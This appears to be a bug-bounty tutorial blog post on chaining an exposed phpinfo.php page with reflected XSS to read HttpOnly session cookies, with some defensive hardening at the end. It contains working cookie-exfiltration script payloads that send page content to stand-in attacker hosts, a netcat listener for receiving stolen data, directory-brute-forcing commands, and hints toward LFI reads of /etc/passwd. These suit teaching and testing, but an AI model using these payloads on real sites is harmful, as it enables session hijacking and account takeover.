Listen to this Post
Introduction:
A lone `phpinfo.php` file is often dismissed as a trivial information disclosure finding by novice bug bounty hunters, leading to low-priority reports and missed opportunities. However, seasoned offensive security engineers understand that true impact is created through vulnerability chaining, transforming seemingly benign data leaks into critical attack vectors. This article deconstructs a proven technique where `phpinfo.php` is weaponized alongside Cross-Site Scripting (XSS) to bypass HttpOnly protections and hijack user sessions, demonstrating the mindset shift required for successful web penetration testing.
Learning Objectives:
- Understand how to systematically analyze a `phpinfo.php` output for chaining potential with other vulnerabilities.
- Learn the step-by-step methodology to exploit an information disclosure flaw to enhance an XSS attack and steal session cookies.
- Master defensive configurations for Apache, Nginx, and PHP to mitigate these risks and harden web applications.
You Should Know:
1. Identifying and Accessing the phpinfo.php File
The first step is locating this common, often accidentally exposed, file. Attackers use automated scanners and manual fuzzing to discover it, as it can reveal the application’s internal state.
Step-by-step guide:
- Automated Discovery: Use tools like
dirb,gobuster, or `ffuf` to brute-force common paths.Linux/Windows (with Go installed) gobuster dir -u https://target.com/ -w /usr/share/wordlists/common.txt -x php Using ffuf ffuf -w /usr/share/wordlists/common.txt -u https://target.com/FUZZ.php
- Manual Checking: Navigate to suspected common paths in a browser or with
cURL.curl -v https://target.com/phpinfo.php
- Analyze Response: A successful find returns a massive HTML page detailing PHP configuration. The key for chaining is that this page reflects input parameters, which is the gateway for XSS.
2. Analyzing phpinfo Output for Attack Vectors
`phpinfo()` displays environment variables, including those passed via the $_GET, $_POST, and `$_SERVER` arrays. An attacker scrutinizes this data for sensitive details and, crucially, for proof that user input is reflected on the page.
Step-by-step guide:
- Locate the `$_GET` Section: Scroll or search the `phpinfo.php` page for the section titled “PHP Variables” or specifically “
$_GET“. - Identify Reflection: Observe that any parameter sent to the page (e.g.,
?test=value) appears here. This proves unsanitized user input is reflected in the output. - Gather Intelligence: Note
DOCUMENT_ROOT,SCRIPT_FILENAME, loaded extensions, and OS details. This aids further exploitation.Use cURL and grep to quickly check for reflection curl "https://target.com/phpinfo.php?TESTPAYLOAD" | grep -A 2 -B 2 "TESTPAYLOAD"
3. Crafting the XSS Payload for phpinfo.php
The core of the attack is injecting a script into the `phpinfo.php` page via a URL parameter. Because the value is reflected in the `$_GET` array section, it will execute when the victim views the page.
Step-by-step guide:
- Basic Payload Test: Confirm XSS vulnerability by injecting a simple alert.
https://target.com/phpinfo.php?<script>alert(document.domain)</script>
- Build Cookie Stealer: Create a payload that sends the page’s content (which includes the victim’s session cookies from other requests in the `$_COOKIE` section) to an attacker-controlled server.
</li> </ol> <script> fetch('https://attacker-server.com/steal?data=' + encodeURIComponent(document.body.innerHTML)) </script>3. URL Encoding: Encode the payload for delivery via a URL.
Using Python for quick encoding python3 -c "import urllib.parse; print(urllib.parse.quote('<script>fetch(\"https://attacker.com/steal?data=\" + encodeURIComponent(document.body.innerHTML))</script>'))"4. Bypassing HttpOnly with phpinfo Chaining
The `HttpOnly` cookie flag prevents JavaScript from directly accessing it via
document.cookie. However, `phpinfo.php` displays all HTTP request headers, including the `Cookie` header, in the `$_SERVER[‘HTTP_COOKIE’]` variable. By chaining XSS, an attacker can exfiltrate this full page, effectively reading `HttpOnly` cookies.Step-by-step guide:
- Setup Listener: Start a netcat listener on your server to receive stolen data.
nc -nlvp 8080
- Craft the Final Payload: The payload must force the victim’s browser to load the `phpinfo.php` page and send its entire HTML (containing the cookies) to you.
</li> </ol> <script> var xhr = new XMLHttpRequest(); xhr.open('GET', '/phpinfo.php', true); xhr.onload = function() { fetch('https://attacker-server.com/log?exfil=' + btoa(xhr.responseText)); }; xhr.send(); </script>3. Deliver the Payload: The attacker must trick a victim into visiting the crafted `phpinfo.php` URL with the XSS payload, often via a reflected XSS in another application, a phishing email, or a stored XSS post.
5. Post-Exploitation and Defensive Hardening
Once session cookies are captured, the attacker can inject them into their own browser to perform a session hijacking attack, impersonating the victim.
Step-by-step guide for Defenders:
- Locate and Remove: Proactively search for and delete any `phpinfo.php` files from production servers.
Find phpinfo files on a Linux server find /var/www -name "phpinfo" -type f
- Server Configuration (Apache/Nginx): Block access to any suspected info files via server rules.
Nginx block rule location ~ (phpinfo|info.php) { deny all; return 403; }Apache .htaccess rule <FilesMatch "^(phpinfo|info\.php)"> Require all denied </FilesMatch>
- PHP.ini Hardening: Ensure `expose_php = Off` is set in `php.ini` to remove PHP version headers.
-
Advanced Chaining: From Cookies to Remote Code Execution
The `phpinfo()` data can reveal paths, versions, and configurations that enable further escalation, such as Local File Inclusion (LFI) or framework exploits.
Step-by-step guide:
- Use Intel for LFI: The `SCRIPT_FILENAME` or `DOCUMENT_ROOT` values can help tune LFI payloads to read critical system files like
/etc/passwd. - Chain with Known Exploits: Discovered PHP modules or versions can be matched with public exploits.
- Automate with Tools: Frameworks like Metasploit have modules that specifically target `phpinfo()` for information gathering to guide subsequent attacks.
What Undercode Say:
- The Mindset is the Multiplier: The critical factor separating novice and expert hunters isn’t the tool, but the operational mindset of seeing vulnerabilities as interconnected components rather than isolated findings. Chaining is a force multiplier.
- Context Defines Criticality: A finding’s severity is not inherent; it is defined by its surrounding technical context and the attacker’s creativity. `phpinfo.php` in a vacuum is low, but `phpinfo.php` in an application with other flaws can be catastrophic.
This technique underscores a fundamental principle in modern application security: defenses are only as strong as their weakest linked component. The future impact of such chaining attacks will grow with the increasing complexity of web applications and microservices architecture. We predict a rise in AI-assisted vulnerability correlation tools that automatically suggest chaining paths to attackers, making these compound exploits more common. Conversely, this will push the security industry towards more holistic, attack-path-aware vulnerability scoring systems like the latest CVSS v4.0 and the development of automated security controls that hunt for and sever these links between seemingly minor issues.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Faiyaz Ahmad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
- Locate and Remove: Proactively search for and delete any `phpinfo.php` files from production servers.
- Setup Listener: Start a netcat listener on your server to receive stolen data.
